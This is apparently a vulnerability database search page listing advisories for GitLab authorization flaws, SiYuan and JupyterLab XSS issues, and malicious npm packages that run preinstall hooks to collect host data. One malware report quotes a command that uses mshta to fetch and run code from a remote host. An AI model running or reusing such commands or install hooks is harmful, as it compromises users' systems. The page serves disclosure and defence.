2274 matches found
BIT-GITLAB-2026-5796 Incorrect Authorization in GitLab
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...
CVE-2026-5952
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.11 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with developer-role permissions to bypass package protection rules and overwrite...
CVE-2026-5796
GitLab CE/EE contains a fixed vulnerability (CVE-2026-5796) that could allow an authenticated user with Reporter-level group permissions to view package metadata from projects when the Package Registry is disabled. Affected versions include all 13.6.x prior to 18.11.6, 19.0.x prior to 19.0.3, and...
CVE-2026-5796
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...
CVE-2026-5796 Incorrect Authorization in GitLab
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...
GitLab 13.6 < 18.11.6 / 19.0 < 19.0.3 / 19.1 < 19.1.1 (CVE-2026-5796)
The version of GitLab installed on the remote host is affected by a vulnerability, as follows: - GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an...
Malicious code in triage-bot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ef2bb10931626a345e1277463f9c2ec6ca36108c2d6131c9210707ea5692a64 package.json declares preinstall: node index.js, so the payload runs automatically on npm install with no user action. index.js requires os, fs, and...
CVE-2026-56395
SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...
CVE-2026-56397
SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...
CVE-2026-56397
CVE-2026-56397 affects SiYuan prior to v3.6.1 where Bazaar marketplace metadata and README aren’t sanitized, allowing malicious authors to inject HTML/JavaScript. This can enable remote code execution on users browsing Bazaar by embedding XSS payloads in displayName, description, or README, takin...
CVE-2026-56395
SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...
CVE-2026-56395 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README
SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...
CVE-2026-56395
SiYuan exposes a vulnerability (CVE-2026-56395) where SieYuan versions prior to 3.6.1 fail to sanitize Bazaar marketplace metadata and README content, enabling arbitrary HTML/JavaScript injection. The underlying issue is improper sanitization of package displayName, description, or README fields,...
PT-2026-51236
Name of the Vulnerable Software and Affected Versions SiYuan versions prior to 3.6.1 Description SiYuan fails to sanitize package metadata and README content within the Bazaar marketplace. This allows malicious authors to inject arbitrary HTML and JavaScript into the displayName, description, or...
GHSA-VMHF-C436-HXJ4 JupyterLab: Stored XSS in extension manager through package metadata unsanitized URI protocol
A malicious PyPI package can place a javascript: URL in its project.urls metadata. JupyterLab's Extension Manager renders this as the extension's home-page link without validating the protocol, so a user who clicks the extension name executes attacker-controlled JavaScript in the JupyterLab origi...
MAL-2026-5895 Malicious code in easyllmai (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2f3b4523b083331b34769a2a730586fa622f50560f2f237a893633e7ffb57872 On npm install, the package's preinstall lifecycle hook "preinstall": "node preinstall.js" unconditionally runs exec'cmd /c "mshta http://fixars.top"...
MAL-2026-5393 Malicious code in @sflyinc-knapsack/shutterfly-react (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1b554d911cfb6d444727262a62e2db10f22a75d53d23741d6c2684f62fb6e5d On require/load, index.js collects host identifiers os.hostname, os.userInfo, os.homedir, DNS server configuration, package.json metadata, and dirnam...
Malicious code in @sflyinc-knapsack/shutterfly-react (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1b554d911cfb6d444727262a62e2db10f22a75d53d23741d6c2684f62fb6e5d On require/load, index.js collects host identifiers os.hostname, os.userInfo, os.homedir, DNS server configuration, package.json metadata, and dirnam...
Malicious code in @druids/ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 071ce35c0d6a17c606e5448f4c485228df973342935b0a11519304050877edf5 The package's package.json declares a dependency ltidisafe resolved not from the npm registry but as a direct tarball URL:...
Malicious code in configcat-trello-powerup (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5365489bc7a763096bf4be47f80bd47e4513917d8b37ba2754e33ae11983872b package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host identifiers os.hostname,...